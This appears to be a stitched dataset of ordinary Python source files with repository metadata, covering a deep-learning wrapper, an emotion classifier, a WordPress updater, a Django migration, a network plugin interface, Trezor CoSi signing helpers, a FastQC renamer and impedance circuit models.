|
# pylint: disable=W0223
# Pylint cannot handle abstract subclasses of abstract base classes
from abc import ABC
import xarray as xr
from pywatts.modules.wrappers.base_wrapper import BaseWrapper
class DlWrapper(BaseWrapper, ABC):
"""
Super class for deep learning framework wrappers
:param model: The deep learning model
    :param name: The name of the wrapper
:type name: str
:param fit_kwargs: The fit keyword arguments necessary for fitting the model
:type fit_kwargs: dict
"""
def __init__(self, model, name, fit_kwargs=None):
super().__init__(name)
self.model = model
if fit_kwargs is None:
fit_kwargs = {}
self.fit_kwargs = fit_kwargs
self.compiled = False
@staticmethod
def _to_dl_input(data: xr.Dataset):
result = {}
for dv in data.data_vars:
da = data[dv]
result[dv] = da.values
return result
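# Illustrative sketch (not part of the original file): the rough shape of a
# concrete wrapper built on DlWrapper. The model object and its fit() signature
# are assumptions, not part of pyWATTS itself.
#
# class MyFrameworkWrapper(DlWrapper):
#     def fit(self, dataset: xr.Dataset):
#         inputs = self._to_dl_input(dataset)  # dict of numpy arrays, keyed by variable
#         self.model.fit(inputs, **self.fit_kwargs)
#         self.compiled = True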
| 26.388889
| 80
| 0.656842
| 751
| 0.790526
| 0
| 0
| 190
| 0.2
| 0
| 0
| 367
| 0.386316
|
8baf2837359bef97c791a3fa5aa72048d1181a43
| 590
|
py
|
Python
|
examples/parallel_spectra.py
|
zhaonat/py-maxwell-fd3d
|
bfa4fb826401b98371fdd9306c5fee2e74e7e545
|
[
"MIT"
] | 3
|
2022-01-21T03:53:25.000Z
|
2022-01-23T04:54:43.000Z
|
examples/parallel_spectra.py
|
Guowu-Mcgill/py-maxwell-fd3d
|
bfa4fb826401b98371fdd9306c5fee2e74e7e545
|
[
"MIT"
] | null | null | null |
examples/parallel_spectra.py
|
Guowu-Mcgill/py-maxwell-fd3d
|
bfa4fb826401b98371fdd9306c5fee2e74e7e545
|
[
"MIT"
] | 1
|
2022-01-23T04:54:47.000Z
|
2022-01-23T04:54:47.000Z
|
import os,sys
Nthread = 1
os.environ["OMP_NUM_THREADS"] = str(Nthread) # export OMP_NUM_THREADS=1
os.environ["OPENBLAS_NUM_THREADS"] = str(Nthread) # export OPENBLAS_NUM_THREADS=1
os.environ["MKL_NUM_THREADS"] = str(Nthread) # export MKL_NUM_THREADS=1
os.environ["VECLIB_MAXIMUM_THREADS"] = str(Nthread) # export VECLIB_MAXIMUM_THREADS=1
os.environ["NUMEXPR_NUM_THREADS"] = str(Nthread) # export NUMEXPR_NUM_THREADS=1
## generate spectrum, which requires several simulations...using mpi4py
# test system will initially be a fabry-perot slab, since the spectrum is analytically determinable
| 59
| 99
| 0.798305
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 417
| 0.70678
|
8bb10d5482f7eb91428767e4939740b77a7d3702
| 2,386
|
py
|
Python
|
Emotional-Recognition-Facial/create_training_classification_set.py
|
ductai199x/No-more-bad-days
|
ceb7da2d2464062ad4aea028cdfa98380661702c
|
[
"Apache-2.0"
] | 1
|
2018-01-18T15:10:40.000Z
|
2018-01-18T15:10:40.000Z
|
Emotional-Recognition-Facial/create_training_classification_set.py
|
ductai199x/No-more-bad-days
|
ceb7da2d2464062ad4aea028cdfa98380661702c
|
[
"Apache-2.0"
] | null | null | null |
Emotional-Recognition-Facial/create_training_classification_set.py
|
ductai199x/No-more-bad-days
|
ceb7da2d2464062ad4aea028cdfa98380661702c
|
[
"Apache-2.0"
] | null | null | null |
import cv2
import glob
import random
import numpy as np
emotions = ["neutral", "anger", "disgust", "happy", "surprise"]
fishface = cv2.face.FisherFaceRecognizer_create() #Initialize fisher face classifier
data = {}
def get_files(emotion): #Get the shuffled training file list and the test file list for one emotion
training_files = glob.glob("dataset//%s//*" %emotion)
test_files = glob.glob("testset//%s//*" %emotion)
random.shuffle(training_files)
    training = training_files[:int(len(training_files)*1.0)] #keep the full training list (split factor left at 1.0)
    prediction = test_files[-int(len(test_files)*1.0):] #keep the full test list (split factor left at 1.0)
return training, prediction
def make_sets():
training_data = []
training_labels = []
prediction_data = []
prediction_labels = []
for emotion in emotions:
training, prediction = get_files(emotion)
#Append data to training and prediction list, and generate labels 0-7
for item in training:
image = cv2.imread(item) #open image
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) #convert to grayscale
training_data.append(gray) #append image array to training data list
training_labels.append(emotions.index(emotion))
for item in prediction: #repeat above process for prediction set
image = cv2.imread(item)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
prediction_data.append(gray)
prediction_labels.append(emotions.index(emotion))
return training_data, training_labels, prediction_data, prediction_labels
def run_recognizer():
training_data, training_labels, prediction_data, prediction_labels = make_sets()
print "training fisher face classifier"
print "size of training set is:", len(training_labels), "images"
fishface.train(training_data, np.asarray(training_labels))
print "predicting classification set"
cnt = 0
correct = 0
incorrect = 0
for image in prediction_data:
pred, conf = fishface.predict(image)
if pred == prediction_labels[cnt]:
correct += 1
cnt += 1
else:
cv2.imwrite("difficult//%s_%s_%s.jpg" %(emotions[prediction_labels[cnt]], emotions[pred], cnt), image) #<-- this one is new
incorrect += 1
cnt += 1
return ((100*correct)/(correct + incorrect))
#Now run it
metascore = []
for i in range(0,10):
correct = run_recognizer()
print "got", correct, "percent correct!"
metascore.append(correct)
print "\n\nend score:", np.mean(metascore), "percent correct!"
| 33.605634
| 129
| 0.731769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 624
| 0.261526
|
8bb228a7e4380e3d2e78dff77a6e5e75257a88f3
| 1,109
|
py
|
Python
|
main.py
|
Zlobin/wp-updater
|
e10ebbb7ddd2a2398c7a660d134ce8598738fe7d
|
[
"MIT"
] | null | null | null |
main.py
|
Zlobin/wp-updater
|
e10ebbb7ddd2a2398c7a660d134ce8598738fe7d
|
[
"MIT"
] | null | null | null |
main.py
|
Zlobin/wp-updater
|
e10ebbb7ddd2a2398c7a660d134ce8598738fe7d
|
[
"MIT"
] | null | null | null |
# python3 main.py
import urllib.request
import zipfile
import os
import shutil
# @TODO change it
# eg.: /var/www/blog
OLD_WP_PATH = ''
NEW_WP_PATH_TMP = ''
if not (os.path.exists(OLD_WP_PATH)) or not (os.path.exists(NEW_WP_PATH_TMP)):
os._exit(0)
WP_URL = 'http://wordpress.org/latest.zip'
EXTRACTED_NAME = 'wordpress'
NEW_WP_PATH = os.path.join(NEW_WP_PATH_TMP, EXTRACTED_NAME)
# Download the file from url, save it in a temporary directory and get the
# path to it (e.g. '/tmp/tmpb43hma') in the `wp_archive` variable:
wp_archive, headers = urllib.request.urlretrieve(WP_URL)
with zipfile.ZipFile(wp_archive, 'r') as zf:
zf.extractall(NEW_WP_PATH_TMP)
os.remove(wp_archive)
# Remove new files
shutil.rmtree(os.path.join(NEW_WP_PATH, 'wp-content'))
os.remove(os.path.join(NEW_WP_PATH, 'readme.html'))
# Copy content to the new WP
shutil.copy2(os.path.join(OLD_WP_PATH, 'wp-config.php'), NEW_WP_PATH)
shutil.copytree(os.path.join(OLD_WP_PATH, 'wp-content'), os.path.join(NEW_WP_PATH, 'wp-content'))
shutil.rmtree(OLD_WP_PATH)
shutil.copytree(NEW_WP_PATH, OLD_WP_PATH)
shutil.rmtree(NEW_WP_PATH)
| 27.04878
| 97
| 0.757439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 354
| 0.319206
|
8bb2c815f8cb9c7313bf196f810ccfc535e6256b
| 435
|
py
|
Python
|
第4章/program/Chapter_4_compare.py
|
kingname/SourceCodeOfBook
|
ab7275108994dca564905818b678bbd2f771c18e
|
[
"MIT"
] | 274
|
2018-10-01T11:07:25.000Z
|
2022-03-17T13:48:45.000Z
|
第4章/program/Chapter_4_compare.py
|
kingname/SourceCodeOfBook
|
ab7275108994dca564905818b678bbd2f771c18e
|
[
"MIT"
] | 6
|
2019-02-28T14:18:21.000Z
|
2022-03-02T14:57:39.000Z
|
第4章/program/Chapter_4_compare.py
|
kingname/SourceCodeOfBook
|
ab7275108994dca564905818b678bbd2f771c18e
|
[
"MIT"
] | 110
|
2018-10-16T06:08:37.000Z
|
2022-03-16T08:19:29.000Z
|
import requests
import time
from multiprocessing.dummy import Pool
def query(url):
requests.get(url)
start = time.time()
for i in range(100):
query('https://baidu.com')
end = time.time()
print(f'Single-threaded loop of 100 requests to Baidu took: {end - start}')
start = time.time()
url_list = []
for i in range(100):
url_list.append('https://baidu.com')
pool = Pool(5)
pool.map(query, url_list)
end = time.time()
print(f'5 threads making 100 requests to Baidu took: {end - start}')
| 18.125
| 40
| 0.682759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 152
| 0.313402
|
8bb336feea80faaae86bf909a42bb1e797a4c310
| 702
|
py
|
Python
|
hole/migrations/0008_auto_20210128_1959.py
|
kavinzhao/fduhole
|
508922cfa0558c58b95206dd8fbf51d10525fa1e
|
[
"Apache-2.0"
] | 9
|
2021-04-14T12:08:38.000Z
|
2021-12-16T08:14:40.000Z
|
hole/migrations/0008_auto_20210128_1959.py
|
kavinzhao/fduhole
|
508922cfa0558c58b95206dd8fbf51d10525fa1e
|
[
"Apache-2.0"
] | 9
|
2021-04-18T09:48:25.000Z
|
2021-11-26T07:43:22.000Z
|
hole/migrations/0008_auto_20210128_1959.py
|
kavinzhao/fduhole
|
508922cfa0558c58b95206dd8fbf51d10525fa1e
|
[
"Apache-2.0"
] | 4
|
2021-07-15T02:10:42.000Z
|
2022-01-22T02:12:11.000Z
|
# Generated by Django 3.1.5 on 2021-01-28 11:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hole', '0007_auto_20210126_2138'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='number',
),
migrations.AddField(
model_name='discussion',
name='content',
field=models.TextField(default=None),
preserve_default=False,
),
migrations.AlterField(
model_name='post',
name='date_created',
field=models.DateTimeField(auto_now_add=True, db_index=True),
),
]
| 24.206897
| 73
| 0.566952
| 609
| 0.867521
| 0
| 0
| 0
| 0
| 0
| 0
| 133
| 0.189459
|
8bb369887e18a7fa4f7256d2ff77d3ccf9f84c6a
| 5,607
|
py
|
Python
|
nfv/nfv-vim/nfv_vim/nfvi/api/v1/_nfvi_network_api.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2020-02-07T19:01:36.000Z
|
2022-02-23T01:41:46.000Z
|
nfv/nfv-vim/nfv_vim/nfvi/api/v1/_nfvi_network_api.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 1
|
2021-01-14T12:02:25.000Z
|
2021-01-14T12:02:25.000Z
|
nfv/nfv-vim/nfv_vim/nfvi/api/v1/_nfvi_network_api.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2021-01-13T08:39:21.000Z
|
2022-02-09T00:21:55.000Z
|
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class NFVINetworkAPI(object):
"""
Abstract NFVI Network API Class Definition
"""
@abc.abstractproperty
def name(self):
"""
Returns the name of plugin
"""
pass
@abc.abstractproperty
def version(self):
"""
Returns the version of the plugin
"""
pass
@abc.abstractproperty
def provider(self):
"""
Returns the vendor who created the plugin
"""
pass
@abc.abstractproperty
def signature(self):
"""
Returns the signature of the plugin
"""
pass
@abc.abstractmethod
def get_networks(self, future, paging, callback):
"""
Get a list of networks using the plugin
"""
pass
@abc.abstractmethod
def create_network(self, future, network_name, network_type,
segmentation_id, physical_network, shared, callback):
"""
Create a network using the plugin
"""
pass
@abc.abstractmethod
def update_network(self, future, network_uuid, shared, callback):
"""
Update a network using the plugin
"""
pass
@abc.abstractmethod
def delete_network(self, future, network_uuid, callback):
"""
Delete a network using the plugin
"""
pass
@abc.abstractmethod
def get_network(self, future, network_uuid, callback):
"""
Get a network using the plugin
"""
pass
@abc.abstractmethod
def get_subnets(self, future, paging, callback):
"""
Get a list of subnets using the plugin
"""
pass
@abc.abstractmethod
def create_subnet(self, future, network_uuid, subnet_name, ip_version,
subnet_ip, subnet_prefix, gateway_ip, dhcp_enabled,
callback):
"""
Create a subnet using the plugin
"""
pass
@abc.abstractmethod
def update_subnet(self, future, subnet_uuid, gateway_ip, delete_gateway,
dhcp_enabled, callback):
"""
Update a subnet using the plugin
"""
pass
@abc.abstractmethod
def delete_subnet(self, future, subnet_uuid, callback):
"""
Delete a subnet using the plugin
"""
pass
@abc.abstractmethod
def get_subnet(self, future, subnet_uuid, callback):
"""
Get a subnet using the plugin
"""
pass
@abc.abstractmethod
def notify_host_disabled(self, future, host_uuid, host_name,
host_personality, callback):
"""
Notify network host disabled using the plugin
"""
pass
@abc.abstractmethod
def enable_host_services(self, future, host_uuid, host_name,
host_personality, callback):
"""
Enable network services on a host using the plugin
"""
pass
@abc.abstractmethod
def get_network_agents(self, future, callback):
"""
Get network agent information using the plugin
"""
pass
@abc.abstractmethod
def get_dhcp_agent_networks(self, future, agent_id, callback):
"""
Get networks hosted by a dhcp agent using the plugin
"""
pass
@abc.abstractmethod
def get_agent_routers(self, future, agent_id, callback):
"""
Get network routers on a hosting agent using the plugin
"""
pass
@abc.abstractmethod
def get_router_ports(self, future, router_id, callback):
"""
Get router ports using the plugin
"""
pass
@abc.abstractmethod
def add_network_to_dhcp_agent(self, future, agent_id, network_id, callback):
"""
Add a network to a dhcp agent using the plugin
"""
pass
@abc.abstractmethod
def remove_network_from_dhcp_agent(self, future, agent_id, network_id, callback):
"""
Remove a network from a dhcp agent using the plugin
"""
pass
@abc.abstractmethod
def add_router_to_agent(self, future, agent_id, router_id, callback):
"""
Add a router to an agent using the plugin
"""
pass
@abc.abstractmethod
def remove_router_from_agent(self, future, agent_id, router_id, callback):
"""
Remove router from an agent using the plugin
"""
pass
@abc.abstractmethod
def get_physical_network(self, future, network_id, callback):
"""
Get physical network of a network using the plugin
"""
pass
@abc.abstractmethod
def delete_host_services(self, future, host_uuid, host_name,
host_personality, callback):
"""
Delete network services on a host using the plugin
"""
pass
@abc.abstractmethod
def query_host_services(self, future, host_uuid, host_name,
host_personality, check_fully_up,
callback):
"""
Query network services on a host using the plugin
"""
pass
@abc.abstractmethod
def initialize(self, config_file):
"""
Initialize the plugin
"""
pass
@abc.abstractmethod
def finalize(self):
"""
Finalize the plugin
"""
pass
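# Illustrative sketch (not part of the original file): the minimal shape of a
# concrete plugin. All names below are hypothetical; a real plugin must override
# every abstract property and method declared above.
#
# class ExampleNetworkPlugin(NFVINetworkAPI):
#     @property
#     def name(self):
#         return "example-network-plugin"
#
#     def get_networks(self, future, paging, callback):
#         # issue the backend query, then invoke callback with the result
#         ...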
| 24.809735
| 85
| 0.574817
| 5,455
| 0.972891
| 0
| 0
| 5,487
| 0.978598
| 0
| 0
| 1,962
| 0.34992
|
8bb4b5b36380f83dc59bb259a75e2877488cbe5c
| 750
|
py
|
Python
|
array/max_subarray.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
array/max_subarray.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
array/max_subarray.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
# DP; Time: O(n); Space: O(1)
def max_subarray(nums):
for i in range(1, len(nums)):
if nums[i - 1] > 0:
nums[i] += nums[i - 1]
return max(nums)
# Time: O(n); Space: O(1)
def max_subarray2(nums):
max_sum = nums[0]
curr_sum = nums[0]
for i in range(len(nums)):
if curr_sum + nums[i] > nums[i]:
curr_sum += nums[i]
else:
curr_sum = nums[i]
if curr_sum > max_sum:
max_sum = curr_sum
# curr_sum = max(nums[i], curr_sum + nums[i])
# max_sum = max(max_sum, curr_sum)
return max_sum
# Test cases:
print(max_subarray([-2, 1, -3, 4, -1, 2, 1, -5, 4]) == 6)
print(max_subarray([1]) == 1)
print(max_subarray([5, 4, -1, 7, 8]) == 23)
| 22.058824
| 57
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 146
| 0.194667
|
8bb4f4ea88058eb0410caa3dc14fb32b876055fc
| 4,696
|
py
|
Python
|
python/trezorlib/cosi.py
|
Kayuii/trezor-crypto
|
6556616681a4e2d7e18817e8692d4f6e041dee01
|
[
"MIT"
] | null | null | null |
python/trezorlib/cosi.py
|
Kayuii/trezor-crypto
|
6556616681a4e2d7e18817e8692d4f6e041dee01
|
[
"MIT"
] | 1
|
2019-02-08T00:22:42.000Z
|
2019-02-13T09:41:54.000Z
|
python/trezorlib/cosi.py
|
Kayuii/trezor-crypto
|
6556616681a4e2d7e18817e8692d4f6e041dee01
|
[
"MIT"
] | 2
|
2019-02-07T23:57:09.000Z
|
2020-10-21T07:07:27.000Z
|
# This file is part of the Trezor project.
#
# Copyright (C) 2012-2018 SatoshiLabs and contributors
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License version 3
# as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the License along with this library.
# If not, see <https://www.gnu.org/licenses/lgpl-3.0.html>.
from functools import reduce
from typing import Iterable, List, Tuple
from . import _ed25519, messages
from .tools import expect
# XXX, these could be NewType's, but that would infect users of the cosi module with these types as well.
# Unsure if we want that.
Ed25519PrivateKey = bytes
Ed25519PublicPoint = bytes
Ed25519Signature = bytes
def combine_keys(pks: Iterable[Ed25519PublicPoint]) -> Ed25519PublicPoint:
"""Combine a list of Ed25519 points into a "global" CoSi key."""
P = [_ed25519.decodepoint(pk) for pk in pks]
combine = reduce(_ed25519.edwards_add, P)
return Ed25519PublicPoint(_ed25519.encodepoint(combine))
def combine_sig(
global_R: Ed25519PublicPoint, sigs: Iterable[Ed25519Signature]
) -> Ed25519Signature:
"""Combine a list of signatures into a single CoSi signature."""
S = [_ed25519.decodeint(si) for si in sigs]
s = sum(S) % _ed25519.l
sig = global_R + _ed25519.encodeint(s)
return Ed25519Signature(sig)
def get_nonce(
sk: Ed25519PrivateKey, data: bytes, ctr: int = 0
) -> Tuple[int, Ed25519PublicPoint]:
"""Calculate CoSi nonces for given data.
These differ from Ed25519 deterministic nonces in that there is a counter appended at end.
Returns both the private point `r` and the partial signature `R`.
`r` is returned for performance reasons: :func:`sign_with_privkey`
takes it as its `nonce` argument so that it doesn't repeat the `get_nonce` call.
`R` should be combined with other partial signatures through :func:`combine_keys`
to obtain a "global commitment".
"""
# r = hash(hash(sk)[b .. 2b] + M + ctr)
# R = rB
h = _ed25519.H(sk)
bytesize = _ed25519.b // 8
assert len(h) == bytesize * 2
r = _ed25519.Hint(h[bytesize:] + data + ctr.to_bytes(4, "big"))
R = _ed25519.scalarmult(_ed25519.B, r)
return r, Ed25519PublicPoint(_ed25519.encodepoint(R))
def verify(
signature: Ed25519Signature, digest: bytes, pub_key: Ed25519PublicPoint
) -> None:
"""Verify Ed25519 signature. Raise exception if the signature is invalid."""
# XXX this *might* change to bool function
_ed25519.checkvalid(signature, digest, pub_key)
def verify_m_of_n(
signature: Ed25519Signature,
digest: bytes,
m: int,
n: int,
mask: int,
keys: List[Ed25519PublicPoint],
) -> None:
if m < 1:
raise ValueError("At least 1 signer must be specified")
selected_keys = [keys[i] for i in range(n) if mask & (1 << i)]
if len(selected_keys) < m:
raise ValueError(
"Not enough signers ({} required, {} found)".format(m, len(selected_keys))
)
global_pk = combine_keys(selected_keys)
return verify(signature, digest, global_pk)
def pubkey_from_privkey(privkey: Ed25519PrivateKey) -> Ed25519PublicPoint:
"""Interpret 32 bytes of data as an Ed25519 private key.
Calculate and return the corresponding public key.
"""
return Ed25519PublicPoint(_ed25519.publickey_unsafe(privkey))
def sign_with_privkey(
digest: bytes,
privkey: Ed25519PrivateKey,
global_pubkey: Ed25519PublicPoint,
nonce: int,
global_commit: Ed25519PublicPoint,
) -> Ed25519Signature:
"""Create a CoSi signature of `digest` with the supplied private key.
This function needs to know the global public key and global commitment.
"""
h = _ed25519.H(privkey)
a = _ed25519.decodecoord(h)
S = (nonce + _ed25519.Hint(global_commit + global_pubkey + digest) * a) % _ed25519.l
return Ed25519Signature(_ed25519.encodeint(S))
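# Illustrative sketch (not part of the original file): a complete two-signer
# CoSi round using only the helpers above. Keys and the digest are random
# placeholders; wrapping it in a function keeps import side-effect free.
def _example_cosi_round():
    import os
    digest = os.urandom(64)
    privkeys = [os.urandom(32) for _ in range(2)]
    pubkeys = [pubkey_from_privkey(sk) for sk in privkeys]
    global_pk = combine_keys(pubkeys)
    # each signer produces a nonce pair; the R parts combine into the commitment
    nonces = [get_nonce(sk, digest) for sk in privkeys]
    global_commit = combine_keys([R for _, R in nonces])
    sigs = [
        sign_with_privkey(digest, sk, global_pk, r, global_commit)
        for sk, (r, _) in zip(privkeys, nonces)
    ]
    signature = combine_sig(global_commit, sigs)
    verify(signature, digest, global_pk)  # raises if the signature is invalid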
# ====== Client functions ====== #
@expect(messages.CosiCommitment)
def commit(client, n, data):
return client.call(messages.CosiCommit(address_n=n, data=data))
@expect(messages.CosiSignature)
def sign(client, n, data, global_commitment, global_pubkey):
return client.call(
messages.CosiSign(
address_n=n,
data=data,
global_commitment=global_commitment,
global_pubkey=global_pubkey,
)
)
| 33.784173
| 105
| 0.70379
| 0
| 0
| 0
| 0
| 426
| 0.090716
| 0
| 0
| 1,977
| 0.420997
|
8bb52f491af72661c47a685434d4940a457e1a8b
| 2,881
|
py
|
Python
|
workflow/scripts/modifyFastQC.py
|
StephenRicher/RNA-Flow
|
57890772cb95beb390990618eb02f5d6e138312b
|
[
"MIT"
] | null | null | null |
workflow/scripts/modifyFastQC.py
|
StephenRicher/RNA-Flow
|
57890772cb95beb390990618eb02f5d6e138312b
|
[
"MIT"
] | null | null | null |
workflow/scripts/modifyFastQC.py
|
StephenRicher/RNA-Flow
|
57890772cb95beb390990618eb02f5d6e138312b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
""" Create new FastQC zip directory with a new sample name for multiQC."""
import os
import sys
import logging
import zipfile
import tempfile
import argparse
__version__ = '1.0.0'
def main(zipIn, zipOut, sample, **kwargs):
with tempfile.TemporaryDirectory() as tmpDir:
# Create temporary file path for storing updated 'fastqc_data.txt'
updatedData = os.path.join(tmpDir, 'fastqc_data-updated.txt')
# Copy Zip archive to new location but extract 'fastqc_data.txt'
with zipfile.ZipFile(zipIn, 'r') as zipInfd, zipfile.ZipFile(zipOut, 'w') as zipOutfd:
zipOutfd.comment = zipInfd.comment
for item in zipInfd.infolist():
if item.filename.endswith('fastqc_data.txt'):
# Retrieve archive name for adding back in later.
arcname = item.filename
# Extract data to temporary directory.
originalData = zipInfd.extract(item.filename, tmpDir)
else:
zipOutfd.writestr(item, zipInfd.read(item.filename))
with open(originalData) as originalf, open(updatedData, 'w') as updatef:
for line in originalf:
if line.startswith('Filename'):
                    header = line.split()[0]
                    updatef.write(f'{header}\t{sample}\n')
else:
updatef.write(line)
# Add updated data back to the original zip path
with zipfile.ZipFile(zipOut, mode='a', compression=zipfile.ZIP_DEFLATED) as zf:
zf.write(updatedData, arcname)
def parse_arguments():
custom = argparse.ArgumentParser(add_help=False)
custom.set_defaults(function=main)
custom.add_argument(
'zipIn', help='FastQC output zip directory.')
custom.add_argument(
'zipOut', help='Path to updated FastQC zip directory.')
custom.add_argument(
'sample', help='New sample name for multiQC parsing.')
epilog='Stephen Richer, University of Bath, Bath, UK (sr467@bath.ac.uk)'
base = argparse.ArgumentParser(add_help=False)
base.add_argument(
'--version', action='version', version=f'%(prog)s {__version__}')
base.add_argument(
'--verbose', action='store_const', const=logging.DEBUG,
default=logging.INFO, help='verbose logging for debugging')
parser = argparse.ArgumentParser(
epilog=epilog, description=__doc__, parents=[base, custom])
args = parser.parse_args()
    log_format = '%(asctime)s - %(levelname)s - %(funcName)s - %(message)s'
logging.basicConfig(level=args.verbose, format=log_format)
return args
if __name__ == '__main__':
args = parse_arguments()
return_code = args.function(**vars(args))
logging.shutdown()
sys.exit(return_code)
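# Example invocation (illustrative, not part of the original script):
#   ./modifyFastQC.py sample_fastqc.zip renamed_fastqc.zip newSampleName
# rewrites the 'Filename' field inside fastqc_data.txt so multiQC reports the
# results under 'newSampleName'.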
| 34.710843
| 94
| 0.637279
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 820
| 0.284623
|
8bb63310aa365a92b778a469e0b31fbf329b889f
| 7,711
|
py
|
Python
|
v0/aia_eis_v0/circuits/circuit_pack_01.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | 1
|
2022-03-02T12:57:19.000Z
|
2022-03-02T12:57:19.000Z
|
v0/aia_eis_v0/circuits/circuit_pack_01.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
v0/aia_eis_v0/circuits/circuit_pack_01.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
from circuits.elements import ele_C as C
from circuits.elements import ele_L as L
from circuits.elements import ele_Warburg as WB
from circuits.elements import ele_Q as Q
"""
Zhihui added many simple circuits on top of the original few; merge them with the rest when time allows.
"""
"""
Define all the circuits used in this project
Naming rules for the Python circuit-model function names:
'a' == '('; 'b' == ')': the letter a stands in for a left parenthesis and b for a right parenthesis
Circuit(ECM) No. CDC Function
0 R(CR) RaCRb, Simplified Randles Cell
0 R0aC0R1b
1 R(QR) RaQRb
1 R(QR) R0aQ0R1b
2 R(QR)(QR) RaQRbaQRb
2 R(QR)(QR) R0aQ0R1baQ1R2b
3 R(QR(LR)) RaQRaLRbb
3 R(QR(LR)) R0aQ0R1aL0R2bb
4 R(Q(RW)) RaQaRWbb
4 R(Q(RW)) R0aQ0aR1W0bb
5 R(QR)(QR)W RaQRbaQRbW
5 R(QR)(QR)W R0aQ0R1baQ1R2bW0
6 R(QR)(Q(RW)) RaQRbaQaRWbb
6 R(QR)(Q(RW)) R0aQ0R1baQ1aR2W0bb
7 R(QR)W RaQRbW
7 R(QR)W R0aQ0R1bW0
8 R(Q(RW))Q RaQaRWbbQ
8 R(Q(RW))Q R0aQ0aR1W0bbQ1
9 R(Q(R(QR))) RaQaRaQRbbb
9 R(Q(R(QR))) R0aQ0aR1aQ1R2bbb
Q_pair = (q, n) or [q, n]
q: CPE coefficient, Constant phase element [s^n/ohm]
    n: Constant phase element exponent [-]
WB_sigma: warburg coefficient
"""
# ECM-0 R(CR)
# ECM-0 R0(C0R1)
def RaCRb(w, R0, R1, C0):
# RaCRb == R0aC0R1b, Simplified Randles Cell
z = R0 + 1 / (1 / R1 + 1j * w * C0)
return z
# ECM-1 R(QR), already include ECM-0, when n = 1
def RaQRb(w, R0, Q0_pair, R1):
z = R0 + 1 / ((1 / R1) + (1 / Q(w, q = Q0_pair[0], n = Q0_pair[1])))
return z
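# Illustrative usage sketch (not part of the original file): evaluating ECM-1
# over a frequency sweep; the parameter values are made-up placeholders.
#   import numpy as np
#   w = 2 * np.pi * np.logspace(-2, 5, 50)                # angular frequency [rad/s]
#   z = RaQRb(w, R0=10.0, Q0_pair=(1e-5, 0.9), R1=200.0)
#   nyquist = (z.real, -z.imag)                           # typical EIS Nyquist axes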
# ECM-2 R(QR)(QR)
def RaQRbaQRb(w, R0, Q0_pair, R1, Q1_pair, R2):
z = R0 \
+ 1 / ((1 / R1) + (1 / Q(w, q = Q0_pair[0], n = Q0_pair[1])))\
+ 1 / ((1 / R2) + (1 / Q(w, q = Q1_pair[0], n = Q1_pair[1])))
return z
# ECM-3 R(QR(LR))
def RaQRaLRbb(w, R0, Q0_pair, R1, L0, R2):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0], n=Q0_pair[1])) + (1 / R1) + (1 / (L(w, L0) + R2)))
return z
# ECM-4 R(Q(RW))
def RaQaRWbb(w, R0, Q0_pair, R1, W0):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0], n=Q0_pair[1])) + (1 / (R1 + WB(w, sigma=W0))))
return z
# ECM-5 R(QR)(QR)W
def RaQRbaQRbW(w, R0, Q0_pair, R1, Q1_pair, R2, W0):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0], n=Q0_pair[1])) + (1/R1)) \
+ 1 / ((1 / Q(w, q=Q1_pair[0], n=Q1_pair[1])) + (1/R2)) \
+ WB(w, sigma=W0)
return z
# ECM-6 R(QR)(Q(RW))
def RaQRbaQaRWbb(w, R0, Q0_pair, R1, Q1_pair, R2, W0):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0],n =Q0_pair[1])) + (1/R1)) \
+ 1 / ((1 / Q(w, q=Q1_pair[0],n=Q1_pair[1])) + (1/(R2 + WB(w, sigma=W0))))
return z
# ECM-7 R(QR)W
def RaQRbW(w, R0, Q0_pair, R1, W0):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0], n=Q0_pair[1])) + (1/R1)) + WB(w, sigma=W0)
return z
# ECM-8 R(Q(RW))Q
def RaQaRWbbQ(w, R0, Q0_pair, R1, W0, Q1_pair):
z = R0 + 1 / ((1 / Q(w, q=Q0_pair[0],n=Q0_pair[1])) + (1 / (R1 + WB(w, sigma=W0)))) \
+ Q(w, q=Q1_pair[0], n=Q1_pair[1])
return z
# ECM-9 R(Q(R(QR)))
